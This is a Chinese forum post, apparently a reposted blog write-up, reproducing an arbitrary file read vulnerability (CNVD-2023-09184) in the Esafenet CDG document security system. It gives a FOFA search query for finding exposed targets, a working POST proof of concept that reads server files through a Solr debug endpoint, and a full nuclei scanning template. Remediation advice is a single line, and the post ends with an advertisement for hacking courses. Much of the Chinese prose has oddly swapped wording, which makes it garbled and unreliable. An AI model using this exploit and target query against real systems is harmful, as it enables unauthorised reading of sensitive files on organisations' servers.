卖不甜枣 发表于 2024-8-22 05:11:25

(漏洞复现:CNVD-2023-09184)亿赛通电子文档安全管理系统任意文件读取漏洞

产品介绍&&漏洞形貌

亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统使用驱动层透明加密技术,通过对电子文档的加密掩护,防止内部员工泄密和外部人员非法窃取企业焦点紧张数据资产,对电子文档举行全生命周期防护,系统具有透明加密、自动加密、智能加密等多种加密方式,用户可根据部门涉密程度的差别(如焦点部门和普通部门),摆设力度轻重不一的梯度式文档加密防护,实现技术、管理、审计举行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、服从和安全三者达到平衡,实现电子文档的数据安全。
亿赛通电子文档安全管理系统任意文件读取漏洞(CNVD-2023-09184),攻击者可通过此漏洞获取敏感信息。
漏洞复现

1:Fofa语法
app=”亿赛通-电子文档安全管理系统”

https://i-blog.csdnimg.cn/blog_migrate/144ed3d0025e534c12cd2489ca083ae9.png

2:界面如下

https://i-blog.csdnimg.cn/blog_migrate/3f221e8e0bdf598fa275e99c6d9fd8b5.png

3:漏洞复现
打开页面,通过GET请求输入路径
/solr/flow/debug/dump?param=ContentStreams 界面返回内容
https://i-blog.csdnimg.cn/blog_migrate/5a46ab03eca70914517c69e863743774.png
使用burp抓包
 
https://i-blog.csdnimg.cn/blog_migrate/70dc74f1da9541bddc025e51fb5f200e.png

修改成post请求添加poc
poc:
路径:
/solr/flow/debug/dump?param=ContentStreams

stream.url=file:///C:\Program Files\ https://i-blog.csdnimg.cn/blog_migrate/8d7790e93037b837a21ccc057d65c75c.png

成功读取文件
nuclei验证

id: yisaitong-CNVD-2023-09184
info:
name: yisaitong-CNVD-2023-09184
author:
severity: high
description: |
亿赛通电子文档安全管理系统是一款电子文档安全加密软件。亿赛通电子文档安全管理系统存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。
reference:
亿赛通电子文档安全管理系统存在任意文件读取漏洞(CNVD-2023-09184) - Kode's ...
metadata:
max-request: 3
fofa-query: app="亿赛通-电子文档安全管理系统"
hunter-query:
verified: true
tags: 2023,yisaitong,亿赛通,任意文件读取

http:
- raw:
- |
POST /solr/flow/debug/dump?param=ContentStreams HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

stream.url=file:///C:\Program Files\
matchers:
- type: word
words:
- 'org.apache.solr.handler.DumpRequestHandler'
https://i-blog.csdnimg.cn/blog_migrate/59f89ebe8a875af45a73bd9603878254.png
修复发起

1、产商已发布安全版本,请联系产商修复
       免费领取安全学习资料包!https://i-blog.csdnimg.cn/blog_migrate/ea6b7846b700c21c8f629ef679cd4f95.png

   
   
   渗出工具
   https://i-blog.csdnimg.cn/blog_migrate/146994e08a39d9ea82963fd463755902.png
   技术文档、书籍
   https://i-blog.csdnimg.cn/blog_migrate/dfa2cb6c718bb1fca33ca56f4aa2dea9.png https://i-blog.csdnimg.cn/blog_migrate/f560c1bd81b511453c51da2e231472c6.png
   https://i-blog.csdnimg.cn/blog_migrate/62a6feee09964fec2a61f19d27ea50b2.png
   口试题
   帮助你在口试中脱颖而出
   https://i-blog.csdnimg.cn/blog_migrate/97e5ef2d0985c5785b25885b8320d2b3.png
   视频
   基础到进阶
   环境搭建、HTML,PHP,MySQL基础学习,信息网络,SQL注入,XSS,CSRF,暴力破解等等
   https://i-blog.csdnimg.cn/blog_migrate/7b221f482cdf035aeafe53e0e590cdc6.png https://i-blog.csdnimg.cn/blog_migrate/8e0e1a1ef48f8e02c7b4cd34c9d9d42e.png
   https://i-blog.csdnimg.cn/blog_migrate/13149f575eaa61a2d83d406fadf5d7f6.png
   应急响应条记
   https://i-blog.csdnimg.cn/blog_migrate/e26e170308b2f1e63e968f90cb23e7c6.png
   学习路线
   https://i-blog.csdnimg.cn/blog_migrate/8a461ae5e8d86812b9ceedfd1ba96fbd.png

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: (漏洞复现:CNVD-2023-09184)亿赛通电子文档安全管理系统任意文件读取漏洞